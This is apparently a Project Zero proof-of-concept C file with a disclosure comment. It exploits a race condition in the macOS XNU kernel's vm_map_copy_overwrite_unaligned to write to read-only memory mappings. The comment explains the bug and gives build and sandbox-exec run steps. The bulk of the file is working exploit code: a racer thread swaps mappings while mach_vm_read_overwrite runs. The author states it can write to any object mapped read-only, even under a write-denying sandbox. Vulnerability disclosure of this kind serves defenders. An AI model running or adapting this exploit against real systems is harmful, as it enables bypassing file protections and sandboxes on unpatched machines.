// ianbeer
#if 0
XNU race condition in vm_map_copy_overwrite_unaligned allows writing to read-only mappings

This could be considered a variant of P0 issue 2360 though I'm reporting it separately 
as it would be possible to fix that issue and miss this. It requires the map unlock/relock
used by that other issue but isn't focused on copy-on-write.

Please read the description of P0 issue 2360 first for the background on vm_map_copy_overwrite_unaligned.

I mention in that writeup that when a map version comparison fails the entry covering the 
destination region currently being processed gets looked up again. The issue is that they 
don't redo the checks done in the caller (vm_map_copy_overwrite_nested.) This could be an 
entry for a totally different vm_object, and one with totally different permissions. It's 
vm_map_copy_overwrite_nested which checks whether the vm_map_entry is writable and we can
bypass that by forcing a map unlock with two contiguous vm_objects. Even though there are 
map timestamp checks their failure isn't fatal - the code will just try again.

This PoC uses this to write to a read-only test file, which is --r--r--r on the file system, 
opened O_RDONLY and mmaped PROT_READ.

create such a file like this:

    % python3 -c "print('A'*4096)" > AAAAs
    % chmod a-w AAAAs

To further demonstrate that something bad is happening here, you can run the PoC inside a 
sandbox which denies all file write operations:

    % cat read_only.sb
    (version 1)
    (allow default)
    (import "system.sb")

    (deny file-write*)

build this poc:
    % clang -O1 -o unaligned_write_to_read_only_mapping_bypass unaligned_write_to_read_only_mapping_bypass.c

and run it with that sandbox profile:

    % sandbox-exec -f read_only.sb ./unaligned_write_to_read_only_mapping_bypass ./AAAAs

If the PoC worked you should be able to cat that AAAAs file and see that the first character is now C.

Note that you're not restricted to only writing to files - this bug doesn't really have anything to 
do with files. They are just a convenient example where there are clear security consequences for 
being able to write to a file you should only be able to read. This technique should allow you to 
write to any vm_object for which you can obtain a read-only mapping.

Tested on MacOS 12.6 on an *Intel* machine - PoC makes assumptions about page size and optimizations 
which are only valid there. The bug should affect ARM platforms as well but I've been doing all this
XNU virtual memory research on Intel machines because there's a real kernel debugger there which is a 
requirement for figuring this stuff out.
#endif

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <sched.h>
#include <sys/mman.h>
#include <fcntl.h>

#define PAGE_SIZE 0x1000

void key() {
  return;
  printf("press enter to continue...\n");
  size_t len = 0;
  fgetln(stdin, &len);
}

void* alloc_at(mach_vm_address_t desired_address, mach_vm_size_t size) {
  kern_return_t kr;
  mach_vm_address_t actual_address = desired_address;
  kr = mach_vm_allocate(mach_task_self(), &actual_address, size, VM_FLAGS_FIXED);
  if (kr != KERN_SUCCESS || actual_address != desired_address) {
    printf("fixed allocation at 0x%llx of size 0x%llx failed...\n", desired_address, size);
  }

  return (void*)desired_address;
}

volatile int running = 0;
volatile int keep_going = 1;

size_t obj_size = 256*1024;

int target_fd = -1;

void map_file_page_ro(int fd, void* target_addr) {
  void* mapped_at = mmap(target_addr, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_FIXED | MAP_SHARED, fd, 0);
  if (mapped_at != target_addr) {
    printf("MMAP FAILED\n");
  }
}

volatile int thread_paused = 1;
void* thread_func(void* arg) {
  running = 1;
  mach_vm_address_t addr = (mach_vm_address_t)arg;
  while (1) {
    thread_paused = 0;
    while(keep_going) {

      // flip the target area between a writable anonymous mapping and the target ro file mapping

      // anonymous writable mapping:
      mach_vm_deallocate(mach_task_self(), addr, PAGE_SIZE);
      alloc_at(addr, PAGE_SIZE);
      *((char*)addr) = 'A';


      usleep(100);

      map_file_page_ro(target_fd, addr);


      usleep(100);
      //printf("thread did a switch\n");
    }
    thread_paused = 1; // okay it's not really paused, also this is an INTEL only poc!
    while (!keep_going) {;}
  }
  return NULL;
}


pthread_t th = NULL;

char* success_ptr = NULL;

void test() {
  kern_return_t kr;

  mach_vm_address_t e0 = 0x4100000000;
  mach_vm_address_t e2 = e0 - obj_size;

  alloc_at(e0, obj_size);
  memset((void*)e0, 'A', obj_size);
  printf("allocated e0 at: 0x%llx\n", e0);
  key();

// don't want this to coalesce with e0
#if 0
  alloc_at(e2, obj_size);
  memset((void*)e2, 'B', obj_size);
#endif

  // make a memory object
  mach_port_t named_port = MACH_PORT_NULL;
  kr = mach_memory_object_memory_entry_64(
                        mach_host_self(),
                        1,
                        obj_size,
                        VM_PROT_READ | VM_PROT_WRITE,
                        MACH_PORT_NULL,
                        &named_port);
  if (kr != KERN_SUCCESS) {
    printf("failed to allocate memory object\n");
  }

  kr = mach_vm_map(mach_task_self(),
                 &e2,
                 obj_size,
                 0, // mask
                 VM_FLAGS_FIXED,
                 named_port,
                 0,
                 1, // copy
                 VM_PROT_READ | VM_PROT_WRITE,
                 VM_PROT_READ | VM_PROT_WRITE,
                 VM_INHERIT_NONE); // inheritance
  if (kr != KERN_SUCCESS) {
    printf("failed to map memory object copy at e2\n");
  }
  printf("mapped e2 at: 0x%llx\n", e2);

  printf("about to memset 0x%x bytes at 0x%llx to 'B'\n", obj_size, e2);
  memset((void*)e2, 'B', obj_size);
  key();


  // make a cow copy:
  mach_vm_address_t e1 = 0;
  mach_msg_type_number_t cow_read_size = obj_size;
  kr = mach_vm_read(mach_task_self(),
               e0,
               obj_size,
               (vm_offset_t*)&e1,
               &cow_read_size);

  if (kr != KERN_SUCCESS) {
    printf("making the COW read failed...?\n");
  }

  printf("allocated e1 (cow?) at: 0x%llx\n", e1);
  key();
  // allocate a source region:

  mach_vm_address_t e5 = 0x4200000000;
  alloc_at(e5, obj_size*2);
  memset((void*)e5, 'C', obj_size*2);
  /*
  printf("allocated e5 (source region) at: 0x%llx\n", e5);
  printf("about to perform the copy\n");
  printf("from: 0x%llx\n", e5);
  printf("for : 0x%llx\n", (2));
  printf("to  : 0x%llx\n", (e0-1));
  */
  key();

 
  // spin up the racer thread
  if (th == NULL) {
    running = 0;
    pthread_create(&th, NULL, thread_func, (void*)e0);
    while(running == 0) {;}
 }


  keep_going = 1;

  // do the unaligned object copy:



  printf("before: %c %c\n", (*(char*)(e0-1)), (*(char*)(e0)));

  mach_vm_size_t copied_size = ((PAGE_SIZE-1)*2);
  kr = mach_vm_read_overwrite(
    mach_task_self(),     // copy FROM this map
    e5,                   //      FROM this address
    obj_size,    //       FOR this many bytes
    (e2+1), //      TO this address in this current map 
    &copied_size);

  if (kr != KERN_SUCCESS) {
    printf("overwrite failed\n");
  } else {
    printf("overwrite succeeded\n");
  }
  
  key();

  if (*success_ptr != 'A') {
    printf("wrote to read only file! (char at success_ptr: %c\n", *success_ptr);
    sleep(100);
  }


  printf("after: %c %c\n", (*(char*)(e0-1)), (*(char*)(e0)));

  keep_going = 0;
  while (!thread_paused){;}

  kr = mach_vm_deallocate(mach_task_self(), e0, obj_size);
  if (kr != KERN_SUCCESS) {
    printf("deallocating e0 failed\n");
  }
  mach_vm_deallocate(mach_task_self(), e1, obj_size);
  mach_vm_deallocate(mach_task_self(), e2, obj_size);
  mach_vm_deallocate(mach_task_self(), e5, obj_size*2);
  mach_port_deallocate(mach_task_self(), named_port);
}


int main(int argc, char** argv) {
  printf("pid: %d\n", getpid());

  if (argc < 2) {
    printf("please specify a target file\n");
    return 0;
  }

  target_fd = open(argv[1], O_RDONLY);
  if (target_fd == -1) {
    printf("failed to open the target file\n");
  }

  // map the first page of that file so we can test if it ever gets changed in the UBC:
  success_ptr = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, target_fd, 0);
  if (success_ptr == MAP_FAILED) {
    printf("failed to mmap file for success test\n");
    return 0;
  }

  printf("success ptr starts off as: %c\n", *success_ptr);

  while(1) {
    test();
  }
  return 0;
}
